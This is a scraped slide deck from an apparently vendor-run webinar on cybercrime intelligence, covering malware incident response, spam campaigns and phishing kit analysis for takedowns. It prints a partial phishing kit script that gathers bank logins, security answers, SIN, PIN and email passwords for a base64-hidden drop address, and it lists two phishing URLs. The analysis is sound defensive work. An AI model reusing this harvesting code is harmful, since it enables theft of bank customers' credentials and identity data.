Upload
katherine-white
View
215
Download
0
Embed Size (px)
Citation preview
CONFIDENTIAL 1
Thank you for joining us today for
How to Fight Cybercrime with Enterprise Security Intelligence
The webinar will begin shortly…
CONFIDENTIAL 2
What do you do with an Infected PC?Some organizations
say: Our policy is to re-
image the computer. No exceptions.
• Does that sound familiar?
• We hear the argument that this is the safest option.
• What’s the worst that can happen?
CONFIDENTIAL 4
What is YOUR worst case scenario?
Data breach involving Intellectual Property?
Direct Financial Loss?Data Breach Involving PII?
CONFIDENTIAL 5
Verizon 2013 Data Breach Investigations Report
Study of 47,000 security incidents with 621 confirmed data breaches, of which
40% were caused by malware
47% of those malware attacks originated with an E-mail attachment
In Large Enterprises, 63% of malware attacks originated with an Email attachment.
“Keep in mind that these vectors are not mutually exclusive. In many cases, an actor may gain initial entry using a malicious e-mail attachment and then install additional malware on that and other systems throughout the environment.”
CONFIDENTIAL 6
The Inevitable Click
• How many emails do I have to send your employees to get someone to click?
• If I send 3: 50% chance; If I send 10: Guaranteed
ThreatSim.com Quoted in Verizon DBIR
CONFIDENTIAL 8
Top malicious spamYesterday
From: "Gregorio Mack" <[email protected]>Subject: FW: Invoice 0043412
CONFIDENTIAL 9
This is what the AV detection looked like for yesterday morning’s most prevalent malicious spam campaign.
One & a half hours into the campaign, detection was only 4/48.
CONFIDENTIAL 11
ATTACK!Now, what if AFTER all of that happens, we realize that the original email had a malicious attachment, and so we send a PC tech to format machine of initial victim?
TOP SECRET
CONFIDENTIAL 12
Long Detect Times
• Mandiant reported in M-Trends 2013: Attack the Security Gap that the median number of days from evidence of compromise to discovery of compromise was 243 DAYS!
• General Keith Alexander told an audience at Georgia Tech:
Most of the folks who get into the [DoD] networksare in there for six to nine months before they’re
discovered.
CONFIDENTIAL 13
Malware Intelligence1. What CAN THIS MALWARE DO?2. Where did it come from?
a) What was the initial attack vector?b) Has that vector contacted any other resource?
3. What does this computer HAVE ACCESS TO?4. What has the compromised computer DONE?
a) Received additional files?b) Ex-filtrated data?c) Are there any new accounts or files since the
compromise?d) Exceeded or attempted to exceed authority on
any internal resources?
CONFIDENTIAL 14
Today’s Top Threat
• Each day we document the behavior of the most prevalent malicious spam campaigns, reviewing interactions with the file system, network traffic, and registry changes.–What is the spam subject?–What hostile URLs are advertised?–What hostile attachments are present?–What network touches does the malware
make?–What additional malware drops if
executed?
CONFIDENTIAL 15
What is Cyber Intelligence?
The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision making.
CONFIDENTIAL 18
http://www.go-polymers.com/flash/hsbc.com.bh12idv/Authentication/idv.Authentication.htm
February 27, 2013
CONFIDENTIAL 19
http://www.go-polymers.com/admin/authentication.bns_Scotiabank/
authentication.bns.htm
February 22, 2013
CONFIDENTIAL 20
Phishing Timeline (Takedown View)
GOAL: Protect customer credentials by improving takedown speed. Time is
Money.
CONFIDENTIAL 21
Phishing Clusters• For a single brand, we group the many
attacks into clusters of similar phish.• Phishing sites in the same cluster are
composed of highly-similar file sets.
CONFIDENTIAL 22
Trend AnalysisBy using the Conditional Formatting feature in i2, we can identify emerging threats.
Phishing sites that were identified in the current month are red and enlarged, while older phish are grayed-out.
CONFIDENTIAL 23
Phishing KitsPhishing sites are usually made by hacking an existing web site and uploading a set of files necessary to create the look and feel of the brand being imitated.
Action files, usually with a .PHP extension, handle the business of sending the stolen data to the criminal via an email message.
When a criminal has a kit that proves successful, they tend to re-use the kit until something stops them.
CONFIDENTIAL 24
Confirm.php<?php$ip = $_SERVER['REMOTE_ADDR'];$user = $_POST['user'];$pass = $_POST['pass'];$q1 = $_POST['q1'];$a1 = $_POST['a1'];$q2 = $_POST['q2'];$a2 = $_POST['a2'];$q3 = $_POST['q3'];$a3 = $_POST['a3'];$sin1 = $_POST['sin1'];$sin2 = $_POST['sin2'];$sin3 = $_POST['sin3'];$dobd = $_POST['dobd'];$dobm = $_POST['dobm'];$doby = $_POST['doby'];$dl = $_POST['dl'];$issue = $_POST['issue'];$pin = $_POST['pin'];$email = $_POST['email'];$emailp = $_POST['emailp'];
$data ="--------- G00dLuck ---------User: $userPass: $pass-----Q1: $q1A1 $a1Q2: $q2A2 $a2Q3: $q3A3 $a3----Dob: $dobd - $dobm - $dobySIN : $sin1 - $sin2 - $sin3Dl : $dl Pin: $pin Issue: $issueE-mail: $email / $emailp--Ip: $ip--------- G00dLuck ---------";$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t'); $emailusr2 = base64_decode('');
$subj="RBC # $user - $pass - $doby - $dl";
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
Which decodes to: [email protected]
CONFIDENTIAL 25
Overlaying Drop Email data• Each red dot indicates a criminal’s
email address.• More lines = more phishing sites for
that address.
CONFIDENTIAL 26
Phishing Timeline (Intelligence View)
GOAL: Drive Major Criminals Away from OUR BRAND
CONFIDENTIAL 27
https://PhishIQ.com/submit• We’re always
looking for new sources of phishing or spam data.
• An online form is available, but feel free to contact us if you are a high-volume contributor.
CONFIDENTIAL 28
Thank you!
Shortly after the webinar, these slides will be available where you registered at:
http://info.malcovery.com/fight-cybercrime-with-enterprise-security-intelligence
Connect with us on LinkedIn by joining the groupEnterprise Security Intelligence and Big Data
Follow us on Twitter: @malcovery
CONFIDENTIAL 29
Best Case Scenario
• Malware was detected today• A clear source of infection is readily
identifiable from today• Only a single “unexplained” EXE or
DLL is found on the machine, and it matches the signature
• The malware is well understood, widely detected, and has a clear and limited purpose
CONFIDENTIAL 30
Our Porous Perimeters• Is the machine mobile?• Is it “forced VPN” back to our organization?• If mobile, and if unlimited access – we don’t
know what it did at or outside the perimeter because we don’t control the perimeter
• Home network, Starbucks wifi, hotel wifi – data exfil could occur in places where we don’t monitor the network